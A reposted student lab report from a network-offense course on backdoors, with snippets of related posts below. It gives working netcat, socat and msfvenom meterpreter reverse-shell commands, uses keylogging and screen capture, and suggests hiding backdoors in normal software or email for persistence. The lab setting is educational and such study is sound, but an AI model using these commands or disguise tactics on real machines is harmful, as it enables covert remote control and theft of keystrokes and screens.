20145335郝昊 《网络对抗》后门原理与实践

最新推荐文章于 2024-09-25 15:20:18 发布
最新推荐文章于 2024-09-25 15:20:18 发布
阅读量236 收藏
点赞数
文章标签: 操作系统 shell 运维
原文链接:http://www.cnblogs.com/20145335hh/p/6556931.html
版权

20145335郝昊 《网络对抗》后门原理与实践

实验内容

  • 使用netcat和socat获取靶机shell,并实现计划启动;Windows获取Linux的shell和Linux获取Windows的Shell

  • 使用msf-meterpreter生成可执行后门软件并发送给靶机shell,并进行一些命令操作,比如查看ip、查看电脑信息,截屏等功能。

实验步骤与结果

Linux获取Windows的Shell

  • 首先kali虚拟机和靶机都要有ncat,windows中需要下载并安装(注意:在运行的时把目录调整到ncat.exe下)

  • kali下使用ifconfig来获取虚拟机的ip

  • 在虚拟机使用 nc -l -p 5335将5335设置成监听端口。在windows下使用命令netcat.exe -e cmd 172.30.5.159 5335

884698-20170315215706916-748729831.png
884698-20170315220356932-1088755708.png

884698-20170315215719463-1306705477.png

windows下获取Linux的Shell

  • windows下使用命令 netcat.exe 172.30.5.159 5335监听

  • kali下使用nc -e /bin/sh -l -p 5335反弹连接

  • 之后在windows下使用命令ifconfig命令进行验证

884698-20170315215739073-2131304973.png

884698-20170315215751370-1948172759.png

ncat传输文件

  • windows使用命令 ncat.exe -lv 1453 > Hfile.exe

  • kali下使用命令ncat -nv 172.30.3.151 1453 <pwnx
    884698-20170315215806698-175627392.png

socat获取主机shell

  • windows利用socat获取kali的shell:

  • 在kali虚拟机上使用socat tcp-listen:5335

  • 同時用socat tcp-l:5335 system:bash,pty,stderr反弹连接

  • windows使用socat readline tcp:172.30.5.159 5335开启监听

  • 成功,使用ifconfig检测

884698-20170315215826776-1598335093.png
884698-20170315215835791-1848459471.png

meterpreter后门程序

  • 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=169.254.161.25 LPORT=208 -f exe >20145335.exe来生成后门程序,然后发送到windows机中。

884698-20170315215918151-1981275972.png

  • 开启msf设置
    884698-20170315215928635-1244198037.png

  • meterpreter信息收集
    884698-20170315215940432-315023071.png

  • 查看系统版本信息
    884698-20170315215950823-1709412913.png

  • 对靶机进行截图

884698-20170315220004166-964424069.png
884698-20170315220012120-2041697377.png
884698-20170315220021260-33364651.png

  • 记录键盘输入

884698-20170315220032198-1828379130.png

  • 后门程序启动
    884698-20170315220044041-833296820.png
    884698-20170315220052620-151905313.png
    884698-20170315220100260-1788825012.png

实验遇到的问题

  • 第一在使用ifconfig命令查看kali的ip地址时候看错了地址,如下图
    884698-20170315220113870-1689827238.png

    应该是172.30.5.159,错看成了广播地址,172.30.7.255导致在做实验的时候遇到了问题

  • 在完成meterpreter后门实验的时候,生成了后门软件,但是在靶机中无法正常运行程序,双击之后程序没有任何反应。后来解决办法是右键,以管理员身份运行,就可以用任务管理器查看出后满软件是否在运行。
    884698-20170315220142870-852677179.png

实验思考

  • 如何将一个后台软件安装到系统中?

    第一可以将后天软件包装在一个正常的软件中,因为通过实验可以发现后门软件内存非常小,完全不会注意到其存在。

    第二可以将后天软件负载到邮件等传播文件中,这样就可以安装到系统中。

  • 后门软件如何启动

    在以上的实验过程中可以windows中可以使用任务启动计划,可以设置相应的条件,如开机时,休眠时,启动某项软件时;Linux中设置cron来完成。

  • meterpreter有哪些给你印象深刻的功能?

    第一,因为是第一次接触后门软件,截图功能给我留下了深刻印象。因为截图可以看到整个电脑屏幕的现状,从而不仅可以获得电脑信息,还可以分析出一个人用电脑的习惯,譬如喜欢全屏操作还是喜欢半屏操作等等。

    第二是键盘记录,在做实验中,我在靶机中没有打开任何软件,只是单纯的在桌面下敲击键盘,然而metrerpreter也能记录出敲击顺序。

  • 如何发现系统有后门软件

    如果发现自己的比较私密的信息会突然出现在不该出现的场合,或者电脑的cpu会猛增,都会可能是后门软件在后台执行。

转载于:https://www.cnblogs.com/20145335hh/p/6556931.html

weixin_30918633
关注
DIG:Dive into Graphs是用于图深度学习研究的交钥匙库。-Python开发
05-25
DIG:用于图深度学习研究的总库,刘萌*,罗有志*,王丽梅*,谢耀辰*,郝昊*,桂树瑞,赵旭,余海阳,张静屯,刘毅,严克强,宝拉·奥兹特金(Bora Oztekin),刘浩然(Haoran Liu),张璇,丛聪(Cong Fu)和姬水旺...
20145335郝昊网络攻防》———免杀原理实践
weixin_30904593的博客
03-22 120
20145335郝昊网络攻防》———免杀原理实践 实验内容 理解免杀技术及其原理,深入理解课堂老师所讲内容; 正确使用msf编辑器(即实验二中后门程序所用编辑器),veil-evasion,自己利用shellcode编程等免杀技巧来完成实验; 正确通过组合应用各种技术实现恶意带代码免杀,避免360安全卫士或各种杀毒软件的查杀。 若完成免杀实验并且成功,将其连回kali虚拟机下进行验证后门木马...
20145335郝昊网络对抗》逆向及Bof基础实践
weixin_30832983的博客
03-01 100
20145335郝昊网络对抗》逆向及Bof基础实践 1.实践说明 本次实践是对一个名为pwn1的可执行Linux文件进行操作。程序的执行流程是:主函数main调用foo函数,foo将函数其功能简单回显任何用户输入的字符串。 程序包含另一个代码片段,getshell,会返回一个可用shell。 使用两种方法进行修改文件pwn1的代码: - 利用`foo`函数的`Bof`漏洞构造一个攻击输入字符...
20145335郝昊网络对抗》Exp 8 Web基础
weixin_30527551的博客
05-07 124
20145335郝昊网络对抗》Exp 8 Web基础 实验内容 本实践的具体要求有: Web前端HTML;能正常安装、启停Apache。理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML。 Web前端javascipt:理解JavaScript的基本功能,理解DOM。编写JavaScript验证用户名、密码的规则。 Web后端:MySQL基础:正常安装、启动MySQL...
20145335郝昊网络对抗技术》Exp6 信息搜集技术
weixin_30878361的博客
04-19 102
20145335郝昊网络对抗技术》Exp6 信息搜集技术 实验内容 本次实验的目标是掌握信息搜集的最基础技能。具体有(1)各种搜索技巧的应用(2)DNS IP注册信息的查询 (3)基本的扫描技术:主机发现、端口扫描、OS及服务版本探测、具体服务的查点(4)漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞 实验步骤 信息收集技术 使用whois命令查询3R信息:注册人-注册商-官方注册局。...
20145335郝昊网络攻防》Exp9 Web安全基础实践
weixin_30709061的博客
05-12 147
20145335郝昊网络攻防》Exp9 Web安全基础实践 实验内容 理解常用网络攻击技术的基本原理。 完成WebGoat实践下相关实验 实验步骤 XSS注入攻击 Phishing with XSS 这个XSS攻击比较简单,需要的是在网页的文本框里写一个钓鱼网站,仔细读给的题目就可以分析出来(但是英语四级没过的我很伤=_=) </form> <script&g...
20145335郝昊网络攻防》恶意代码伪装的技术实践
weixin_30733003的博客
03-27 130
20145335郝昊网络攻防》恶意代码伪装的技术实践 实验内容 将程序后门木马软件进行包装,既绿色化,将木马程序进行伪装,比如其他.exe文件。 通过之气的实验手动编译一个后门程序,在原本的后门程序代码中加入对原木马程序主文件的调用,打开正常的程序。就可以实现隐蔽的后门,这样可以诱导使用者打开后门软件却不知道。 实验步骤 首先需要对于之前的代码的主函数进行修改 注意需要将后门程序在编译的...
20145335郝昊网络攻防》恶意代码分析
weixin_30872789的博客
03-29 144
20145335郝昊网络攻防》恶意代码分析 实验内容 恶意代码的免杀和恶意代码的分析是相互对立的也是相互依托的,当对电脑中的恶意代码进行分析的过程,也就是对于恶意代码逃避查杀的过程,而恶意代码免杀也就是对于恶意代码的分析之后的结果,是否可以逃避查杀或者不能逃避查杀。 本次实验用到了计算机病毒课上老师使用的一些软件,来分析和判断恶意代码的行为。 实验过程 利用计划任务分析 每间隔3分钟对记录...
20145335郝昊网络攻防》Bof逆向基础——ShellCode注入与执行
weixin_30577801的博客
03-12 232
20145335郝昊网络攻防》Bof逆向基础——ShellCode注入与执行 实验原理 关于ShellCode:ShellCode是一段代码,作为数据发送给受攻击服务器,是溢出程序和蠕虫病毒的核心,一般可以获取权限。我们将代码存储到对方的堆栈中,并将堆栈的返回地址利用缓冲区溢出漏洞,覆盖成为指向ShellCode的地址。 Linux中两种基本构造攻击buf:retaddr+nop+shellc...
20145335郝昊网络攻防》Exp7 网络欺诈技术防范
weixin_30594001的博客
04-25 156
20145335郝昊网络攻防》Exp7 网络欺诈技术防范 实验内容 本次实践实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。 简单应用SET工具建立冒名网站。 利用软件ettercap DNS spoof,实现dns欺骗。 实验步骤 URL攻击实验 首先确认kali主机和靶机在同一网段,且能相互ping通。 为了使得apache开启后,靶机通过IP地址能直接访问...
Linux三剑客(grep、sed、awk)【三、awk】
qq_44799103的博客
09-23 709
awk 必须 外层单引号,内层双引号内置变量 $1 $2 都不得加双引号,否则会识别为文本,尽量别加引号awk '{print "第一列:" $1, "第二列:" $2}' tmp.txt",name}'laomao#间接引用shell变量。
深入理解Linux进程机制
TravisBytes的博客
09-25 1008
进程是 Linux 操作系统中管理和调度程序执行的核心概念。理解进程的生命周期、状态、创建与控制机制,以及进程间通信方式,对于系统开发、性能优化和故障排除具有重要意义。通过熟练掌握相关命令和工具,可以有效地管理和监控系统中的进程,确保系统的稳定和高效运行。
【Linux实践】实验四:Shell实用功能及文件权限
最新发布
Fulling的博客
09-25 729
实验内容 1、使用命令“cat /etc/named.conf”设置为别名named,然后再取消别名。 2、使用echo命令和输出重定向创建文本文件/root/nn,内容是hello,然后再使用追加重定向输入内容为word。 3、使用管道方式分页显示/etc/passwd的内容。 4、分别用文字设定法和数字设定法,对/root/ab文件设置权限,所有者为读取、写入和执行权限,同组用户为读取和写入权限,其他用户没有任何权限。 5、将文件/root/ab所有者更改为用户zhangsan。 6、将目录/root/
Linux入门学习:进程概念
Lvision2的博客
09-24 1071
在课本的概念中,进程程序的一个执行实例,正在执行的程序。其内核观点:担当分配系统资源(CPU时间,内存)的实体。但这些概念太笼统,并不能让我们更加清晰的知道进程是什么,实际上,进程是内核数据结构(pcb) + 程序的代码与数据。pcb(process control block)进程控制块,进程信息被放在一个叫pcb的数据结构中,可以理解为进程属性的集合。在Linux入门学习:深刻理解计算机硬件与OS体系中,我们已经了解到。
恢复数据解决方案 :因意外删除而丢失重要数据的痛苦急救方法
GEEKVIP的博客
09-24 776
Geekersoft iPhone 数据恢复工具具有恢复丢失的虚假数据的潜在方法。该应用程序使用的方法为您提供系统以及常规应用程序的任何数据备份和恢复解决方案。数据恢复工具的安装方式很简单,只需下载文件并立即安装即可。您可以从Geekersoft iPhone 数据恢复官方网站下载安装包文件。包文件大小为 几十MB,可立即下载,网速很快。软件的安装过程相对简单,只需单击几下即可直接打开该工具。
【Linux:共享内存】
2201_75755162的博客
09-19 777
共享内存不随着进程的结束就释放,因为共享内存不属于进程而属于操作系统,需要手动释放或者后续其它系统调用。共享内存的生命周期随内核。
Linux项目自动化构建工具-make/Makefile
m0_73936730的博客
09-22 1162
本文介绍make/makefile的基本概念和怎样使用,图文并茂地让读者快速了解并上手make/makefile。
Yocto - 使用Yocto开发嵌入式Linux系统_03 基于Poky制作第一个系统
guoqx的专栏
09-23 1764
更多信息,请参阅《Yocto 项目开发任务手册》(https://docs.yoctoproject.org/4.0.4/dev-manual/start.html#setting-up-to-use-cross-platforms-crops)中的 “设置使用 CROss PlatformS (CROPS)” 部分。build/conf/local.conf 文件中的注释是极好的文档,也是可能的变量及其默认值的参考。它们将为我们提供一些使用 Poky 的经验,并让我们领略到它的能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值